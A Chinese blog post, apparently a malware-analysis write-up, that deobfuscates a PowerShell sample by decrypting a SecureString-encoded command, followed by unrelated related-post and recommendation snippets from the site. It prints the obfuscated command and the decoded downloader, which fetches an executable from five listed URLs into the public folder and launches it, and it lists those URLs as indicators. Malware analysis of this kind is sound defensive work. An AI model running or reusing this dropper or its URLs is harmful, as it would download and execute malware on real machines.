样本地址

https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100#

样本使用ConvertTo-SecureString加密字符串。

代码



 powershell "([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTriNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4AEEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlAGUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1AGUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3AGQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwADkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmAGEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkADAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzAGQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzAGQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0AGIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1AGMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1AGMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmAGYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4ADIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4ADYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlAGMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4AGQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5ADYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1ADEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3ADEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmADQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4ADcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlAGQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0ADQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxAGIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3ADAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxADAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5ADkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2ADQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0ADYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1ADMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwADMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxADkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5ADAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwADMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiADMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjAGIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3AGMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4ADgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmAGMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2AGMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2AGMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmADYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1ADMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhADAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))| .( $Env:cOMSpeC[4,24,25]-JOIn'')




PS C:\Windows\system32> ([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTr

iNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4A

EEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlA

GUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1A

GUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3A

GQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwA

DkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmA

GEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkA

DAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzA

GQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzA

GQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0A

GIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1A

GMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1A

GMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmA

GYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4A

DIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4A

DYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlA

GMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4A

GQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5A

DYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1A

DEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3A

DEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmA

DQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4A

DcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlA

GQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0A

DQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxA

GIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3A

DAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxA

DAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5A

DkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2A

DQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0A

DYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1A

DMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwA

DMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxA

DkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5A

DAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwA

DMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiA

DMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjA

GIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3A

GMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4A

DgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmA

GMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2A

GMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2A

GMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmA

DYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1A

DMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhA

DAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41

,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))

$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000

, 282133);$ADCX = '

http://quote.freakget.com/wp-content/rCk5/@http://www.lightchasers.in/Mwmg/@http://casastoneworks.com.au/9ARR4/@http://

jasclair.com/scI8YTL/@http://convivialevent.fr/IoVWm/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach

($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}}

PS C:\Windows\system32>

Network IoCs:

http://quote.freakget.com/wp-content/rCk5/

http://www.lightchasers.in/Mwmg/

http://casastoneworks.com.au/9ARR4/@http://

http://jasclair.com/scI8YTL/

http://convivialevent.fr/IoVWm/

记一次powershell反混淆(2)的更多相关文章

  1. 记一次Powershell反混淆 (1)

    样本地址: https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1c ...

  2. .net破解一(反编译,反混淆-剥壳)

    大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以第一件事就是用Reflector编译,但是没有想 ...

  3. C# 反编译-Reflector 反混淆-De4Dot 修改dll/exe代码-reflexil

    反编译工具 Reflector 破解版下载地址:http://pan.baidu.com/s/15UwJo 使用方法:略 反混淆工具De4Dot 开源软件 下载地址http://pan.baidu.c ...

  4. js混淆 反混淆 在线

    js反混淆地址:http://www.bm8.com.cn/jsConfusion/ 在线javascript 混淆http://www.moralsoft.com/jso-online/hdojso ...

  5. net破解一(反编译,反混淆-剥壳,工具推荐)

    net破解一(反编译,反混淆-剥壳,工具推荐) 大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以 ...

  6. RESTClient调试POST方法&Reflector+de4dot反混淆破解dll

    RESTClient调试POST方法 RESTClient是火狐的一款WebAPI测试工具. 1.先看下我们要调试的接口

  7. .net反混淆脱壳工具de4dot的使用

    de4dot是一个开源的.net反混淆脱壳工具,是用C#编写的,介绍一下它的使用方法 首先 pushd 到de4dot.exe所在文件夹,然后调用 de4dot.exe  路径+dll名称 如果显示: ...

  8. 通过C#调用,实现js加密代码的反混淆,并运行js函数

    前一篇我测试了vba调用htmlfile做反混淆,并执行js加密函数的代码.本文换成C#实现. 联系QQ:564955427 C#操作JS函数,可以通过ScriptControl组件,但这个组件只能在 ...

  9. 使用VBA进行JS加密的反混淆,还原JS代码。

    本文地址:http://www.cnblogs.com/Charltsing/p/JSEval.html 联系QQ:564955427 类似下面的代码是登陆 全国企业信用信息公示系统(安徽)(网址:h ...

随机推荐

  1. 第111天:Ajax之jQuery实现方法

    由于jQuery中的Ajax方法是用了内置的deferred模块,是Promise模式的一种实现,而我们这里没有讲过,所以我们就不使用这一模式啦. 我们只定义一个Ajax方法,他可以简单的get,po ...

  2. js null表示没有取到html中的元素 undenfind 表示没有被赋值

    js null表示没有取到html中的元素 undenfind 表示没有被赋值

  3. 【bzoj4695】最假女选手 线段树区间最值操作

    题目描述 给定一个长度为 N 序列,编号从 1 到 N .要求支持下面几种操作:1.给一个区间[L,R] 加上一个数x 2.把一个区间[L,R] 里小于x 的数变成x 3.把一个区间[L,R] 里大于 ...

  4. day4 列表 增删改查 元组

    增lis=["a","b","c",5,7,4]lis.append("s")#在列表的末尾追加lis.extend(& ...

  5. 【BZOJ3166】ALO(主席树)

    [BZOJ3166]ALO(主席树) 题面 权限题qwq 资磁洛谷 题解 用一个\(set\)求出左右侧比这个数大的第\(2\)个数, 然后用可持久化\(Trie\)算一下就好啦 #include&l ...

  6. 【HDU5730】Shell Necklace(多项式运算,分治FFT)

    [HDU5730]Shell Necklace(多项式运算,分治FFT) 题面 Vjudge 翻译: 有一个长度为\(n\)的序列 已知给连续的长度为\(i\)的序列装饰的方案数为\(a[i]\) 求 ...

  7. 【SPOJ】QTREE6(Link-Cut-Tree)

    [SPOJ]QTREE6(Link-Cut-Tree) 题面 Vjudge 题解 很神奇的一道题目 我们发现点有黑白两种,又是动态加边/删边 不难想到\(LCT\) 最爆力的做法,显然是每次修改单点颜 ...

  8. 【BZOJ2756】奇怪的游戏(二分,网络流)

    [BZOJ2756]奇怪的游戏(二分,网络流) 题面 BZOJ Description Blinker最近喜欢上一个奇怪的游戏. 这个游戏在一个 N*M 的棋盘上玩,每个格子有一个数.每次 Blink ...

  9. 谷哥的小弟学前端(01)——HTML常用标签(1)

    探索Android软键盘的疑难杂症 深入探讨Android异步精髓Handler 详解Android主流框架不可或缺的基石 站在源码的肩膀上全解Scroller工作机制 Android多分辨率适配框架 ...

  10. Zookeeper(一) zookeeper基础使用

    一.Zookeeper是什么 (安装的是3.4.7) ZooKeeper 是一个分布式的,开放源码的分布式应用程序协调服务,是 Google 的 Chubby 一个开源的实现.它提供了简单原始的功能, ...